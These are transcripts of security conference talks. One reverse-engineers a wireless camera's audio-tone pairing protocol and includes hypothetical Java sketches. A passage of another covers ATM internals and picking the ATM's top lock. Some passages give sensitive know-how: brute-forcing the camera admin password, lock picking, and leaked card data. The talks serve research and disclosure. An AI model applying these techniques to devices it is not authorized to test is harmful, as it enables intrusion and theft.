the phone or the service or the application, a regular user is not going to see the debug output. If you're rushing or release out the door and you don't disable your debug output, somebody like me is going to come along and hook up the Android phone to logcat and investigate for messages if you're curious about what's going on. Now let's take a look at what logs we get as we start this application. Here's the login screen. Here's a little capture from logcat. 
We can see that there's some interesting information in there. There appears to be some kind of an encoded payload, and there are some interesting strings in there. We appear to be getting both informational and debug output. Here's a URL, ap.javalife.net, go Javas. As we continue scrolling through the screen, there are a lot more messages like this. When you try the camera pairing process, you have to enter the SSID and the password. At this stage, we see that there's log output which logs the SSID, the password, and then what appears to be some kind of randomly generated token. In this log output (I know it's really hard to see here) there's a class that we can start to investigate, and there's what appears to be an HTTP helper class, which is what helps send and receive messages back from the cloud server. Let's try to pair to a camera and see what we get. There's a button that says, click to send the sound wave. I just love it; it makes me smile when I see that. When we send the sound wave, we get some additional information. It may not look like much, but there are a few strings here which can help in the analysis. Just to recap what we found so far: we found distinctive characters, we found URLs, and we found a class to investigate, BindDeviceNewActivity. That sounds particularly fitting, given that we are trying to enable and configure a new camera device. So where does this lead us? We can continue our search by taking those strings that we found in the log output and searching for them within Android Studio. As I searched through the decompiled output, I found a few things. It looks like the character one is used to delimit fields, there's something they call a smart code, and then there's a string "1" that's appended at the end of this little message block. Even though Android Studio is calling this message.db NotifyReached, I wonder if this isn't a decompilation artifact of some kind; it really is just the string of the character one. So what is this smart code thing? I noticed that each time I tried to pair the camera to the cloud app, this smart code would change. It would be different every time. And I could see by looking at this boot-up code that yes, every time you attempt to pair the camera, you get six characters of letters and numbers, and that constitutes the smart code. But the question still remains: what is this thing? After having gone through this entire analysis process, seeing it change every single time I attempted to pair, and noticing that whenever I paired the camera a message was sent from the application up to the cloud server that included the random code, I can only presume that the backend cloud service uses this random code to tie this camera to my user account in the cloud. How else is the camera going to identify that it belongs to my account? So that's the best guess that I have for what this code is used for. As we continue looking through the strings, we can see other strings which guide us to functions and methods that warrant further investigation, like run and playVoice. Both of those sound promising. Let's take a closer look and do an extractive analysis. At this point, we've uncovered a lot of functions, methods, and static constants in the code base, and we want to take the key sections out of the vendor application and put them in a clean project so that we can perform an analysis.
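(Based purely on what the log output above seems to show, here is a hedged guess at how the pairing payload might be assembled. Everything in this sketch, including the six-character alphanumeric smart code, the "1" delimiters, and the trailing "1", is an assumption reconstructed from the talk, not confirmed vendor code.)

```java
import java.security.SecureRandom;

// Hypothetical reconstruction of the pairing payload seen in the logcat output:
// SSID, passphrase, and a six-character "smart code", delimited by the character '1'.
public class PairingPayload {
    private static final String ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    private static final SecureRandom RNG = new SecureRandom();

    // Six random letters/numbers, regenerated on every pairing attempt (as observed in the logs).
    static String newSmartCode() {
        StringBuilder sb = new StringBuilder(6);
        for (int i = 0; i < 6; i++) sb.append(ALPHABET.charAt(RNG.nextInt(ALPHABET.length())));
        return sb.toString();
    }

    // Guessed field layout: ssid 1 passphrase 1 smartCode 1
    static String buildPayload(String ssid, String passphrase, String smartCode) {
        return ssid + "1" + passphrase + "1" + smartCode + "1";
    }

    public static void main(String[] args) {
        String code = newSmartCode();
        System.out.println("smart code: " + code);
        System.out.println("payload:    " + buildPayload("DEFCON29", "hunter22", code));
    }
}
```

Whether the delimiter really is the literal character '1', as opposed to a value that merely decodes that way, is exactly the kind of question the clean-project extraction described next is meant to settle.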
Just a couple of notes on setting up the clean application. If you're looking at another application which, like this application here, leverages native libraries, you'll need to manually create a jniLibs folder, put all those compiled libraries into the jniLibs directory, and then you'll need to make sure the Java class and package structure match the originals. So this thing is called com.ithink.voice in the vendor application; I can't call it com.test.reverseengineer. I have to name the package structure the same, because the way that JNI works, it requires those two things to match up. And once you have your sample test project set up, you're able to perform a black box analysis of the code that's used to generate the signal. Along the way, one of the questions that I had was: what are the exact tones that are being generated by the application to pair and bind with the camera? Well, there's a class called VCodeTable, and as I ran it in this extracted project, it produced a mapping of all of the tones, along with the characters that they map to. We have frequencies from 0 up to 4875 Hertz, and there are 16 states, so this is a hexadecimal-style encoding here. Now, looking at what else we found here, there are a lot of findings. We know that the application uses Android's AudioTrack to play the signal. We've identified how it creates the payload as far as the SSID, the password, the random code, and the delimiters between those fields. We've identified control tones, like the frequency-begin and frequency-end tones, that are just static constants. There's also a space tone, which is used when the same tone plays twice back to back; a little space tone pops in between, and that'll be better visualized in a later slide. There are methods which play the characters. There's the use of CRC values to help the camera know whether it has received a complete signal or not. So there's been a wealth of information that we've uncovered through this process. So what do we know now? We can reconstruct all of section one and section two of the signal, because each signal consists of three sections. And now that we can reconstruct section one and section two, really, that just leaves section three. I've highlighted in this image the part of the signal which is elusive at this stage in the analysis. This tone appears to be some type of error correction code. It doesn't exactly track with the CRC process that the rest of the code base uses, though, which left me wondering. And since this is generated by code that's in a native library, it means that I need binary analysis to dig deeper and try to figure out what's going on here. My tool of choice is Ghidra; I don't know how to pronounce that. It's a free tool, it's very capable, and it does the job here. To get set up with Ghidra, you'll want to visit their GitHub page, pull the latest release for your platform, and then follow the installation guide. Once you have Ghidra installed, create a new project and fill out all the wizard boxes; I just took basically all the defaults and gave it a project name. Click the dragon icon. Import the native library that you want to analyze. In my case, I just went with the x86_64 library, since I'm a little bit more comfortable with x86 than I am with ARM libraries at the moment.
When you click the yes button, it'll go through and do an analysis of this compiled library, which you can then navigate in the UI. So, reverse engineering with Ghidra. We need to know what we're looking at here. You want to go to your Android Studio project and make sure that you identify which functions or methods in the higher-level language map to functions in the compiled library. Once you know that, you can look in the symbol tree, and you can see here that there are a number of Java_com entries, so JNI interfaces, here in this native library. The methods that we're looking for are the getVoiceStruct functions that are listed towards the bottom of the screen. And here's a closer view of what you would see in Ghidra as you do this analysis. So now we just need to pick one of the functions and dig in. I focused on this intuitively named function called getVoiceStruct goki2. I love the spelling of voice, and I don't know what goki2 means. This is the function, though, that generates the section 2 and section 3 output for the audio signal. One thing that I noticed as I was doing this analysis is that on the Java side, you pass in eight parameters to this native function, yet on the compiled side, when we look at the function signature in Ghidra, there are 10 parameters. It seems a little odd, but then, doing a little bit of reading, I found that JNI calling conventions add two parameters: there's a JNI environment pointer and then there's an object pointer, and these two parameters are front-loaded onto the function signature. So those first two are just the environment and the object. This top picture is the raw decompiled view, just with all the generated identifiers that don't really make a lot of sense. The bottom picture shows it refactored in Ghidra to indicate that the first two parameters are JNI related. Now let's continue the analysis. Inside of Ghidra, there's a function decompiler window, and the nice thing about Ghidra is that it's like most other IDEs that I've worked with: you can right-click on an identifier, you can rename it, you can highlight it, you can do things that will help you analyze the flow of how a particular parameter is used and manipulated. So this getVoiceStruct goki2 function calls another function that leverages the inputs that are passed into it. What I do in this type of analysis is, for each screen that I'm on, I try to rename and refactor the parameters, methods, and functions to names that actually make some degree of human sense. So that's what I'll be doing here. This is the cleaned-up view, and I know it's small, but the picture shows that each of those parameters is named to reflect what value it represents from the Android side. And then I go from there. I check the usages. This is decompiled output, so sometimes it doesn't exactly make the most sense. For example, I noticed that input parameters are copied to local variables, and those local variables are then used elsewhere. So in the analysis, just keep in mind what you're looking at: track the flow through the locals, through any intermediate steps it goes through, to see where it winds up being manipulated. Now, this is the raw view of that nested function. Fortunately for me, and almost conveniently so for this demo, this is a very small function; it's only about 56 lines long. So it makes it pretty easy to analyze.
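(To make the eight-versus-ten parameter point concrete, here is roughly what the Java side of such a native binding looks like. The package name echoes the one mentioned in the talk, but the method signature, parameter names, return type, and library name are all assumptions for illustration.)

```java
// Hypothetical Java-side view of the native binding described in the talk.
// JNI requires the package and class names to match what the .so was compiled against,
// which is why the extracted test project had to reuse the vendor's package structure.
package com.ithink.voice;   // assumed package name, as heard in the talk

public class VoiceEncoder {
    static {
        // Loads libvoice.so (library name assumed) from the project's jniLibs directory.
        System.loadLibrary("voice");
    }

    // Eight parameters declared here; the compiled function shows ten because the JNI
    // calling convention prepends a JNIEnv* and a jobject before the declared arguments.
    public native byte[] getVoiceStructGoki2(String ssid, String password, String smartCode,
                                             int ssidCrc, int passwordCrc, int codeCrc,
                                             int sampleRate, int toneMillis);
}
```

On the native side, Ghidra shows those same declared arguments plus the two JNI-added ones, which is why renaming the first two parameters to something like env and thiz is usually the first cleanup step.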
Again, since the identifiers in that nested function are all terse and auto-generated, I need to refactor them into something that I can use. So start with what you know and find a good starting point. Even if you can't get all the names to something human-readable, just do what you know, and as you reason through the code, you'll find that the rest of the pieces can fall into place once you've entered what you know. As I went through this and did all the renaming, I found that the critical operation that I needed to apply in my reverse engineering project to replicate section 3 of the signal just came down to a shift. So this is the line: it takes the CRC'd SSID and then shifts it to the right. That's a very simple operation for me to perform in my replicated Android project. It is not something that I was able to figure out just by reasoning through the Java or by passing inputs into the library function and fuzzing the output. I think with enough time I probably would have figured it out, but I get a little impatient, and when I can go explore a little deeper and more fully understand how something works, I'll take that opportunity. So a shift: that's all I had to do to replicate section 3. Now let's think about hacking the signal. How can we recreate this and manipulate it to serve our purposes? Let's look again at what we know. This is the spectrographic waveform of a complete pairing cycle. The waveform is comprised of three sections of hexified data. Each section is prefixed and suffixed by control codes and section identifiers. We know that when two sequential tones are the same, there's a space tone that shows up in between them to help the camera better differentiate and identify distinct signals. The duration of each tone, as I found, is about 50 to 60 milliseconds. And we know the structure of each waveform section. Let's look at section 1. This one's a long one. It's got the frequency-begin tone, it's got the delimited SSID, passphrase, and random code digits, it has CRCs of a bunch of data put together, and then it's got end tones. Section 2 is incredibly simple by comparison: all it carries is the smart code, plus proper error correction on that randomly generated code. So that's very terse, very short, very easy to reason through. Section 3, yeah, this one's a little bit longer as well. We have some CRC codes in there, we have another, kind of mutilated, version of the smart code, there are the passphrase bytes, another CRC, and then this thing wraps up. So we can reproduce the signal now. We know every aspect of every part of the signal, and we are able to recreate it as a result. So that's where the demo comes into play. I created an application which can be used to pair this wireless camera to a wireless network without having to use the cloud application. This enables the camera to be further analyzed using more traditional network-style investigation techniques. So with that, let's go ahead and take a look at the demo. In this demo, we'll be pairing the wireless camera with a wireless network that's hosted on this laptop running hostapd, advertising a DEFCON29 SSID. To do the pairing, we will leverage the reverse engineered application that I created as part of this reverse engineering process, where I've configured the SSID and passphrase. Now, to get this camera to pair, we need to wait for it to get into setup mode.
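(Here is a minimal sketch of the AudioTrack-based tone generation described above. The frequency table, tone length, and space-tone value are placeholders inferred from the talk; sixteen evenly spaced tones is an assumption, not the vendor's actual VCodeTable, so treat this as an illustration of the mechanism rather than a working pairing tool.)

```java
import android.media.AudioFormat;
import android.media.AudioManager;
import android.media.AudioTrack;

// Illustrative only: plays a sequence of stepped tones the way the vendor app appears to,
// one hex digit per tone, roughly 55 ms each, with a "space" tone between repeated digits.
public class TonePlayer {
    private static final int SAMPLE_RATE = 44100;
    private static final int TONE_MS = 55;                 // the talk reports 50-60 ms per tone
    private static final double SPACE_HZ = 5100;           // placeholder control/space frequency

    // Placeholder table: 16 evenly spaced tones; the real VCodeTable values differ.
    private static double digitToHz(int hexDigit) {
        return 3000 + hexDigit * 125;                      // 3000..4875 Hz, assumed spacing
    }

    private static short[] sine(double hz, int ms) {
        int n = SAMPLE_RATE * ms / 1000;
        short[] pcm = new short[n];
        for (int i = 0; i < n; i++) {
            pcm[i] = (short) (Math.sin(2 * Math.PI * hz * i / SAMPLE_RATE) * Short.MAX_VALUE * 0.8);
        }
        return pcm;
    }

    public static void play(int[] hexDigits) {
        // Build one PCM buffer for the whole sequence, inserting a space tone
        // whenever the same digit repeats back to back.
        int samplesPerTone = SAMPLE_RATE * TONE_MS / 1000;
        short[] buf = new short[hexDigits.length * samplesPerTone * 2];
        int pos = 0;
        int prev = -1;
        for (int d : hexDigits) {
            if (d == prev) {
                short[] space = sine(SPACE_HZ, TONE_MS);
                System.arraycopy(space, 0, buf, pos, space.length);
                pos += space.length;
            }
            short[] tone = sine(digitToHz(d), TONE_MS);
            System.arraycopy(tone, 0, buf, pos, tone.length);
            pos += tone.length;
            prev = d;
        }
        AudioTrack track = new AudioTrack(AudioManager.STREAM_MUSIC, SAMPLE_RATE,
                AudioFormat.CHANNEL_OUT_MONO, AudioFormat.ENCODING_PCM_16BIT,
                buf.length * 2, AudioTrack.MODE_STATIC);
        track.write(buf, 0, pos);
        track.play();
    }
}
```

In the real application the sixteen frequencies come from the decompiled VCodeTable class, and the digits being played are the hexified payload plus the control and CRC tones described above.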
After I plug it in, we'll want to wait for the flashing light, and at that point the camera should be susceptible to our suggestion that it pair to a specific network. So I'll plug the camera into the power bank and start it up. On boot, the camera shows a solid green light to indicate that it has power. After it goes through its setup sequence (whatever that entails; I haven't been able to really probe that), it'll go into a flashing-light mode where we can pass it our message. So let's give this a try. Alright, that tone should indicate that the camera has received our pairing message, and in the Wireshark capture, you will see that the camera is communicating with the network and that it's paired. So that is looking good. Let's take another look at the pairing, this time from the screen recording that shows the Wireshark output of our packet capture. As the camera goes through its initialization sequence and receives our pairing code, it should show up requesting an address, which in this case I've targeted to be a specific one in advance. You can see here that it receives an IP address on the local demo network, and it proceeds to phone home and attempt to do the cloud configuration bit. We're going to try connecting to the camera's video now. One thing I do want to note about this camera is that the video connection can be a little bit iffy; it doesn't always work and can require three, four, sometimes upwards of five attempts to get the video signal to work. Here I'm showing an attempt to connect to the camera using VLC, and surprise, surprise, it fires right up. Go figure. Let's go ahead and wrap this up now. There are a few limitations that are worth noting. It's not easy to discover the device's administrative password. It is six hexadecimal characters, and the password changes each time the camera is reset. It doesn't seem to be tied to the MAC or serial number, so just brute forcing your way through it might be one decent option. The easiest option is just to have it pair once to the cloud and pull the password off of that, though that is not the approach I would prefer, if at all possible. It's not really very easy to decipher the camera-to-cloud communication, based off of some of the code that I've seen in the application and what I've intercepted between the camera and the cloud servers. The camera has a local RSA key pair that changes on reset, or potentially between each request. The payloads are encrypted and sent over to the server. Even though you can view the payloads by setting up a self-signed man-in-the-middle server, you can't really make sense of what the payloads are saying. So it could be worth some additional investigation. You also get what you pay for. Even if you know the password, it doesn't always connect: VLC will sometimes connect and sometimes it will not. So just keep that in mind if you want to economize and save a buck or two on a cheap wireless camera. So thank you very much for attending my DEF CON talk. It's been a real pleasure to spend this time with you today. Until next time, bye!
|
All I wanted was a camera to monitor my pumpkin patch for pests, what I found was a wireless security camera that spoke with an accent and asked to speak with my fax machine. Join me as I engage in a signals analysis of the Amiccom 1080p Outdoor Security Camera and hack the signal to reverse engineer the audio tones used to communicate and configure this inexpensive outdoor camera. This journey takes us through spectrum-analysis, APK decompiling, tone generation in Android and the use of Ghidra for when things REALLY get hairy. REFERENCES: - JADX: Dex to Java Decompiler - https://github.com/skylot/jadx - Efficiency: Reverse Engineering with ghidra - http://wapiflapi.github.io/2019/10/10/efficiency-reverse-engineering-with-ghidra.html - Guide to JNI (Java Native Interface) - https://www.baeldung.com/jni - JDSP - Digital Signal Processing in Java - https://psambit9791.github.io/jDSP/transforms.html - Understanding FFT output - https://stackoverflow.com/questions/6740545/understanding-fft-output - Spectral Selection and Editing - Audacity Manual - https://forum.audacityteam.org/viewtopic.php?t=100856 - Get a spectrum of frequencies from WAV/RIFF using linux command line - https://stackoverflow.com/questions/21756237/get-a-spectrum-of-frequencies-from-wav-riff-using-linux-command-line - How to interpret output of FFT and extract frequency information - https://stackoverflow.com/questions/21977748/how-to-interpret-output-of-fft-and-extract-frequency-information?rq=1 - Calculate Frequency from sound input using FFT - https://stackoverflow.com/questions/16060134/calculate-frequency-from-sound-input-using-fft?rq=1 - Introduction - Window Size - https://support.ircam.fr/docs/AudioSculpt/3.0/co/Window%20Size.html - Android: Sine Wave Generation - https://stackoverflow.com/questions/11436472/android-sine-wave-generation - Android Generate tone of a specific frequency - https://riptutorial.com/android/example/28432/generate-tone-of-a-specific-frequency - Android Tone Generator - https://gist.github.com/slightfoot/6330866 - Android: Audiotrack to play sine wave generates buzzing noise - https://stackoverflow.com/questions/23174228/android-audiotrack-to-play-sine-wave-generates-buzzing-noise
|
10.5446/54233 (DOI)
|
Hi everyone, my name is Roy Davis, and welcome to my talk, No Key, No PIN, No Combo, No Problem: Pwning ATMs for Fun and Profit. Shout out to all my homies at DC612 in Minnesota, and for anybody who wants to get a hold of me about the content of this presentation, my contact information is all on the screen there. Before we get too far into this, I've got to say this content is provided for educational and entertainment purposes only. Unauthorized access of other people's ATMs is illegal. Don't do it. Don't do it. You're going to go to jail. Secondly, this presentation is not associated with my employer in any way, except to say they've been very supportive of this opportunity and of me, and I really appreciate that. So why ATMs? There are several answers to this question. The first being that when I was a kid, I used to go to the grocery store with my mom, and she'd walk up to this machine once in a while that said Instant Cash on the front, and I thought, man, this is great. How do I get a piece of this action? I want instant cash. Well, a long time went by. I graduated college, I got into security, and I got into pen testing, and I never forgot about that childhood dream. I always wanted to learn how those things work inside. How can they be configured or misconfigured? What does their network traffic look like, and how secure is that vault? In my opinion, cash is not going away anytime soon. Cash still provides a level of anonymity to people who use it that cards just don't give you; cards leave a paper trail. ATMs are everywhere, all over the world, and increasing in numbers. As you can see in this chart, between 2008 and 2019 the number of ATMs roughly doubled. A lot of people think that, with these machines in bars and restaurants and wherever, as long as the thing keeps working, it's good. The low level of security maintenance adoption for these machines is incredible. If you think it's hard to get PC users or an InfraOps team to apply patches in production, imagine trying to get bar owners to update their ATM software. It's really difficult. Also, a lot of ATM security seems to me to be based on obscurity and lack of design transparency. Huge amounts of documentation are missing. Try searching the internet sometime for communications protocols or encryption implementations or main board pin layouts; it's really difficult to find anything about that. This is a document I found from 2002 discussing the Triton-COM protocol. It's a preliminary release and it's missing a lot of current info. I also believe that if honest researchers continue to expose vulnerabilities in these devices, the increased awareness can only serve to encourage the manufacturers of these devices to make them more secure, which makes all of us safer in the long run. The last reason I'm interested in this kind of research is really all of these folks. A huge shout out and thank you to these pioneers in the ATM and electronic lock research field. They paved the way to establishing safe harbor for ATM vulnerability research, and I greatly appreciate and have enjoyed all of their work. I highly recommend watching these previous presentations if you want to learn more about things like ATM history, network attacks, firmware attacks, power analysis and spike attacks, and malware attacks. All of these previous researchers are brilliant, and in my estimation, most of it is probably beyond the capabilities of your average criminal. Today we're going to look at something a bit more on the physical side of attacks on ATMs.
Our agenda here is all about how I acquired my ATM. We'll look at some damage, some of the ways people damage these things trying to get to the money, and some general ATM info, plus how I became a licensed operator, how that went, and why I did that. We're also going to be picking the ATM case lock, resetting the ATM password, and bypassing the electronic vault lock. And then at the end we'll have some time for Q&A. All right, so what was my goal? It was a fully functioning ATM in my home, which I had complete access to and which was able to process ATM transactions just like in the wild. And I wanted to research and understand the entire attack surface, including the network traffic, the internal serial comms, the data stored on the device, the vault, and the cash dispensing unit. So what I have here behind me is that device. It came true, and I'm going to tell you how that happened. These things are expensive, right? How did I get this thing? If you look on the internet, this thing is probably $4,000 new and a couple grand, two or three thousand, used. That's too much for me if I'm going to do some research. So things like Craigslist and eBay are your friends. I'd been looking for an ATM for a long time when I found this set in 2018: $100 for both. It seemed like a deal. I quickly started researching how they worked, what was inside them, and how to duplicate the attacks Barnaby Jack had done in 2010. One of the things I found right away: default locks on these machines are garbage, commonly available locks that are easy to pick with a rake. Also, among other issues, I found that the audit logs in these ATMs contain a wealth of information, including full debit card numbers and names of previous users in clear text, and dates and amounts of transactions. That was sort of surprising to me. And so I got bored with these things as time went by. I really was interested in getting my hands on an ATM that ran some flavor of Windows, because Windows is fun to hack and has lots of known vulns. I had a saved search with an alert turned on for any auctions of ATMs for sale in Minnesota, and lo and behold, I got a hit. So here's this auction in Cambridge, Minnesota, about an hour and a half north of me. They were selling everything in this restaurant and gas station, and this ATM was up for bid. And this is all the details I got. If you've ever bid on auctions like this, you know that there's a very limited amount of information. I called the place and inquired about the condition of the ATM, asking, you know, what does unknown working condition mean? They had no idea. Everything is being sold as is; it's a foreclosure auction, is all they said. I did ask if there was any money in it, just kind of joking. The reply surprised me: there very well may be. This place got shut down with food on the shelves, drinks in the coolers, and gas in the tanks. So at this point, I have no idea. I think they're just trying to get me to bid, right? Tell me whatever I want to hear. I bid $1. Now, I am quite competitive when it comes to auctions and I don't like to lose, so of course I won with a bid of $220 at the last second. This email is the first time I learned that I won, and I also learned there's no code for the cash box, which I assume means the vault. Well, what's going on here? I have no idea. What's this thing actually worth? Is it worth anything? Am I going to be able to get into it? Does it even work? Who knows?
So I did a little digging and found out that first of all, these machines are like 10 times, worth 10 times what I paid for them. So score. But maybe not if I can't get into the vault and I can't get this thing working. Well, where did this thing come from? The gas station barbecue sounded sort of interesting. Here's the place that was auctioning off everything. I hit opened in 2018, February 1st, less than two years before I won this auction. Very strange. They're going to have Dickies Barbecue if you've ever had it. It's fantastic. I highly recommend it. March 18, kind of a review of the place. But uh-oh, just a little while later, assets 43K liabilities, 1.5 million. That's probably not going to work out long term for any business owner. Things are starting to make sense here. So hop in the car, hour and a half north to Cambridge, and this is what the place looked like when I got there to pick up my ATM. A lot different than opening day. I walk in and I'm at check-in and I'm talking to the lady there and I say, you know, what happened here? How did this place go out of business so fast that, you know, you couldn't get the ATM pin for the vault or the top? And she says, as I understand it, there were some legal issues and the lender foreclosed and shut the place down. Okay, I don't know anything about all that, but you know, that's what you say. So I go back over to the ATM, let's get this thing going. Let's just get this thing in the Jeep and get out of here. I was not anticipating that it was going to be literally bolted to the floor and completely immovable. Okay. So I can't get into the vault to remove the nuts that are obviously holding this thing down to the floor. It's in cement. So I call the locksmith and I said, hey, you know, I'm at this gas station. I want this auction. Could you please come over and help me break into this ATM to help me move it? The answer was a resounding no. No. So I asked the lady, you know, how am I going to get this thing out of here? What's going to happen to this place? She said, I don't care. You got to have that thing out of here today. I don't care what you do to get it out. I said, what if I have to damage the floor? No problem. They're going to bulldoze this place at some point later. I don't care. I'm just here to auction stuff off. Okay. All right. Well, I want this thing undamaged because I want to do research on it and afterwards I might want to use this thing and like start a business, make some money with an ATM. Who knows? So the only thing I can think of is go down to Home Depot and rent this guy, the Bosch Brute Turbo. Up to this point, I'd never used a jackhammer in my life, but how hard could it be? Right? I've seen it done in cartoons. Well, so I start jackhammering and hitting the ATM a couple of times there and jackhammering some more and I'm getting a little further and jackhammering more and it finally starts to come out and lean a little bit. It finally did fall over and I removed the concrete slab from the bottom. Again, with the jackhammer. For anyone wondering, it takes an novice jackhammer user roughly 40 minutes or so to get an ATM fully extracted from a cement floor. All right. Here it is out on the curb. In the Jeep it goes and magically now it's back that afternoon in my office. Mission accomplished. I plugged it in and booted it up and said, you know, I'm staring at this thing like, okay, so now what? What do I have to do to make this thing fully operational? 
I want to stick my card in this thing and have it give me money. I have no idea, I have no idea what to do. Time to research. The first thing I noticed when I booted this thing up is that it's running Windows CE. That's pretty interesting to me. What could possibly go wrong? I was looking for a Windows box. So the next thing I did was hook it up to my local LAN and run an Nmap scan. Now, you'll see on the left here that I posted the Nmap scan that Trey Keown and Brenda So did at last year's DEF CON. They had a lot of open ports on this exact same model. I only had 5555 open, which I learned from their talk is the remote management agent. I did install the remote management software and connect to it, but I did not do any sort of penetration testing against that endpoint. It was very intriguing and very attractive to do that, but it was not the focus of my research at the time. Trey and Brenda also demonstrated an overflow attack against this port that allowed modification of settings within the ATM. I would love to learn more about that and try that attack here. Okay, so here is the screen when I first boot up the machine. Apologies for the terrible photo. After booting, I get this thing. It says the encrypted PIN pad has gone bad (I have no idea what that means) and it needs to be replaced. I learned error code 97999, EPP error. All right, what's this going to cost me? So 320 bucks later, I've got a refurbished one, and things are getting a little bit expensive. And so at this point, I've got to install an EPP in a machine that I've never really taken apart or worked on, but at least I know how to get into the top, which we'll see here shortly. The first thing I needed to do was a little research on the inside of this machine, and along the way I put together a few slides about how ATMs work. So before we get too far, let's just take a couple of minutes here. There are two main categories of ATMs, with the distinguishing factors being the level of security the housing provides for the electronics and the money, the banking features available to users, and the amount of money within the machine itself. Drive-up ATMs are typically associated directly with banks and are mounted in an external wall of a bank, in a specially built enclosure like this one, or as a standalone unit, like out in a parking lot. There's really no easy access to the money or the electronics from the front of this machine; you really have to get into the building or get into the back somehow. Stealthy, undetectable access takes time, knowledge, and skill, or granted access as an employee. The second type of ATM is the one you're probably most familiar with, and it's the type I bought for my research. These are much less expensive, and there's far less security built into them, because they're designed to be installed where people are present and working, like gas stations and such. They usually are not directly associated with any sort of bank; they're owner-operated, so the gas station owner probably owns that machine as well. It changes the threat model a little bit here, because there's much less oversight to detect modifications to the ATM software, housing, or network connection if this thing is installed in a hotel lobby, or a big long hallway at a hotel conference center, or somewhere like a bowling alley where there's not a lot of supervision.
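(Going back to the network scan for a moment: if you just want to re-check the one management port mentioned above without firing up Nmap, a trivial TCP connect test is enough. This is a generic sketch; the IP address is a placeholder, and port 5555 is simply the one reported open on this machine.)

```java
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.Socket;

// Quick reachability check for a single TCP port (e.g., the ATM's remote management agent).
public class PortCheck {
    public static void main(String[] args) {
        String host = "192.168.1.50";   // placeholder: the ATM's address on the lab LAN
        int port = 5555;                // the only port found open in the talk's scan
        try (Socket s = new Socket()) {
            s.connect(new InetSocketAddress(host, port), 2000);  // 2 second timeout
            System.out.println(host + ":" + port + " is open");
        } catch (IOException e) {
            System.out.println(host + ":" + port + " is closed or filtered: " + e.getMessage());
        }
    }
}
```

Anything beyond confirming that the port answers, such as poking at the management protocol itself, is the territory of the overflow research referenced above, which this sketch deliberately does not touch.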
As we've seen, these things can be bolted directly to the floor, but many times they're not because it's a temporary use location or it's going to be a limited time there or they move it around a lot, or for whatever reason maybe they just can't do that. They can't bolt it to the floor. People trying to get access to the money in these machines do a lot of damage, typically with various devices like blow torches, crowbars. This is actually the same machine I bought. This Triton 9100 looks like somebody used some sort of a cutting tool. I'm not sure why they chose that spot. You can't actually get to the money going through the side there, so they were probably very disappointed or caused more damage to the CDU unit in there. During my research, I see all this damage and I'm thinking, is this really what it takes to get into one of these things? Can you do it any other way? Can you do it in a way that doesn't leave obvious evidence? Maybe the answer is no. I don't know. This one's my personal favorite because I like 4th of July, so anytime you go with explosives I'm going to watch. Not attracting any attention here for sure. Here we stick the incendiary device in the output of where the cash comes out, which is an interesting choice. It just basically destroys the entire top, but the cash box remains intact. That is not a good way to try and get into an ATM. I would be really surprised if anyone here has never used an ATM, so I'm sure you're all familiar with these external parts that I've highlighted here. We're going to go past this. All of the ATMs that you'll see essentially have the same internal parts and external parts. One thing you can see here is the false door, the safe door cover. That is protected by a cylinder lock, which is typically keyed the same as the lock that protects the electronics. Behind that false door is the electronic lock keypad and the lock bolt handle. You can see a wire coming out of the door here. That's a power cable for the light over the cash dispensing portal on the false door. Let's take a look inside the vault. Here we can see the door where the money comes out and dust below that. We can see the bolt action lever that lifts these huge teeth that interlock with the frame to keep the safe door shut. The safe door, by the way, is about 70 pounds. It weighs more than anything else on the machine. There's a look at the electric lock inside. There is what's called the cash dispensing unit. On the cash dispensing unit is also a reject bin. Then there is the cash cassette, which plugs basically into a slot underneath the reject bin. We're going to take a closer look at all of these different things. Inside here you can see the belt-driven device that brings the money up and out of the cash dispensing unit. The next thing we're going to look at here is the reject bin. Not very exciting, but I thought you guys might just like the look in there. This is where crumpled money goes, things that can't go through the CDU. This is the back of the CDU. You can see the serial interface that goes up to the main board and also the power supply, which also goes up to the power supply in the main compartment. This here is the cash cassette. It also is locked with a tubular lock. Inside we can see the pressure-driven dispenser. It's spring-loaded. You can see a few bills in there. This is where 1,000 bills can fit if you so desire. This same machine that I have, even though it right now is configured with one cassette, it can be configured with three cassettes. 
The module just plugs right in. It's really not a big deal. Fully loaded, this machine has a cash capacity of up to $300,000, because each cassette can be configured to hold hundreds. As we're going to see — and you make the call at the end of this presentation — do you think the locks and everything protecting that potential $300,000 are adequate or not? Moving on to the top of the device, this lock is, like I said, usually keyed the same as the front. As mentioned, it can be picked. I'm showing you there that the lock is indeed locked, and there's the cylinder lock pick I used. These cylinder locks have seven or eight pins; this one in particular has eight pins. I insert the pick and I start jiggling it back and forth, which moves the pins up into the right position and unlocks the lock. Didn't take very long at all. You could also just buy this key on eBay. If you are lucky enough to get your hands on an ATM like I did for cheap and you don't have the key, here you go, go buy a key. Let's have a look inside here, inside the top. Not many people get to look in here. I figured I'd give you a look here as well. Here are all the wires that go down to the CDU. These come up and there's the printer module, there's the power supply — a straight five volt power supply, I believe, to the board and 12 volts everywhere else. Here is the receipt printer. It has its own board and a serial connection and power cables there. All these cables come up through a junction right at the base of the main unit and there we see the main board. The main board here has an SD card and a lot of dip switches that change modes and do various things. We see an HDMI cable connector and a couple of USB ports. Then over here on the other side, we will see all of the different serial ports that drive the different pieces and parts of the ATM itself. There's the Ethernet cable, there's the modem and the printer port. Down here we have the card reader, there's where all the money comes out, and right below there is the encrypted PIN pad, the EPP that I replaced. All right, wonderful. We've seen the inside, and I mentioned the Ethernet port. This thing is obviously talking to the internet and it's obviously somehow doing transactions. How does that work? Whether it's through a modem or it's through a NIC or something, we get an internet connection to the PPH, the payment processing host, using something called the Triton protocol. Then from there, we're going to go to what's called the interbank network. What is that? First of all, the processing host provides the connection information and encryption keys, which are configured in the ATM computer. They take a small percentage — the processor does — of the transaction fee, which is determined by the owner and charged to the user for each transaction. There are hundreds of processing companies to pick from. I just threw up a few brands here. An interbank network, the next step, is also known as the ATM consortium or the ATM network. It's a computer network that enables ATM cards issued by a financial institution that is a member of the network to be used in ATMs that belong to another member of that same consortium. The way the banking industry grew up in America was very fragmented. There were a lot of little mom and pop shops and a lot of little networks everywhere.
